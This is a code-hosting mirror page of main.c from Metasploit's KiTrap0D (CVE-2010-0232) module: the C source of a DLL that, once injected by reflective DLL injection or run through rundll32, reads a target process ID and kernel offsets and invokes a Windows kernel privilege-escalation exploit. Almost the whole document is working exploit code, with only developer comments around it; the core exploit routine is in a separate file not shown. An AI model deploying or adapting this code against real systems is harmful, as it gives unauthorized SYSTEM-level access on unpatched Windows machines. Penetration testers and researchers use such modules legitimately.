CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c
Views: 11784
1
//

2
// Note: To use the produced x86 dll on NT4 we use a post build event "editbin.exe /OSVERSION:4.0 /SUBSYSTEM:WINDOWS,4.0 elevator.dll" 

3
//       in order to change the MajorOperatingSystemVersion and MajorSubsystemVersion to 4 instead of 5 as Visual C++ 2008

4
//       can't build PE images for NT4 (only 2000 and up). The modified dll will then work on NT4 and up. This does

5
//       not apply to the produced x64 dll.

6
//

7


8
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR

9
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN

10
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"

11


12
#include <stdlib.h>

13
#include "kitrap0d.h"

14
#include "../common/common.h"

15


16
/*!

17
 * @brief Grab a \c DWORD value out of the command line.

18
 * @example elevator_command_dword( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141

19
 * @param cpCommandLine Command line string

20
 * @param cpCommand The command to look for to get the associated \c int from.

21
 * @returns The \c int value associated with the \c cpCommand.

22
 */

23
DWORD elevator_command_dword(char * cpCommandLine, char * cpCommand)

24
{

25
	char * cpString = NULL;

26
	DWORD dwResult = 0;

27


28
	do

29
	{

30
		if (!cpCommandLine || !cpCommand) {

31
			break;

32
		}

33


34
		cpString = strstr(cpCommandLine, cpCommand);

35
		if (!cpString) {

36
			break;

37
		}

38


39
		cpString += strlen(cpCommand);

40


41
		dwResult = strtoul(cpString, NULL, 0);

42


43
	} while (0);

44


45
	return dwResult;

46
}

47


48
/*!

49
 * @brief Grab an \c int value out of the command line.

50
 * @example elevator_command_dword( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345

51
 * @param cpCommandLine Command line string

52
 * @param cpCommand The command to look for to get the associated \c int from.

53
 * @returns The \c int value associated with the \c cpCommand.

54
 */

55
int elevator_command_int(char * cpCommandLine, char * cpCommand)

56
{

57
	char * cpString = NULL;

58
	int iResult = 0;

59


60
	do

61
	{

62
		if (!cpCommandLine || !cpCommand) {

63
			break;

64
		}

65


66
		cpString = strstr(cpCommandLine, cpCommand);

67
		if (!cpString) {

68
			break;

69
		}

70


71
		cpString += strlen(cpCommand);

72


73
		iResult = atoi(cpString);

74


75
	} while (0);

76


77
	return iResult;

78
}

79


80
/*!

81
 * @brief The real entrypoint for this app.

82
 * @param cpCommandLine Pointer to the command line.

83
 */

84
VOID elevator_main(char * cpCommandLine)

85
{

86
	DWORD dwResult = ERROR_SUCCESS;

87


88
	do

89
	{

90
		dprintf("[KITRAP0D] elevator_main. cpCommandLine=0x%08X", (DWORD)cpCommandLine);

91


92
		if (!cpCommandLine) {

93
			break;

94
		}

95


96
		if (strlen(cpCommandLine) == 0) {

97
			break;

98
		}

99


100
		dprintf("[KITRAP0D] elevator_main. lpCmdLine=%s", cpCommandLine);

101


102
		DWORD dwProcessId = 0;

103
		DWORD dwKernelBase = 0;

104
		DWORD dwOffset = 0;

105


106
		dwProcessId = elevator_command_dword(cpCommandLine, "/VDM_TARGET_PID:");

107
		dwKernelBase = elevator_command_dword(cpCommandLine, "/VDM_TARGET_KRN:");

108
		dwOffset = elevator_command_dword(cpCommandLine, "/VDM_TARGET_OFF:");

109


110
		if (!dwProcessId || !dwKernelBase) {

111
			break;

112
		}

113


114
		dprintf("[KITRAP0D] Invoking exploit");

115
		elevator_kitrap0d(dwProcessId, dwKernelBase, dwOffset);

116


117
		// ...we should never return here...

118
		dprintf("[KITRAP0D] This shouldn't happen");

119
	} while (0);

120
}

121


122
/*!

123
 * @brief rundll32.exe entry point.

124
 * @todo Remove this?

125
 */

126
VOID DLLEXPORT CALLBACK a(HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int nCmdShow)

127
{

128
	elevator_main(lpszCmdLine);

129


130
	ExitProcess(ERROR_SUCCESS);

131
}

132


133
/*!

134
 * @brief DLL entry point.

135
 * @remark If we have been injected via RDI, lpReserved will be our command line.

136
 */

137
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)

138
{

139
	BOOL bReturnValue = TRUE;

140


141
	switch (dwReason)

142
	{

143
	case DLL_PROCESS_ATTACH:

144
		hAppInstance = hInstance;

145
		if (lpReserved != NULL) {

146
			elevator_main((char *)lpReserved);

147
		}

148
		break;

149
	case DLL_PROCESS_DETACH:

150
	case DLL_THREAD_ATTACH:

151
	case DLL_THREAD_DETACH:

152
		break;

153
	}

154


155
	return bReturnValue;

156
}

157


158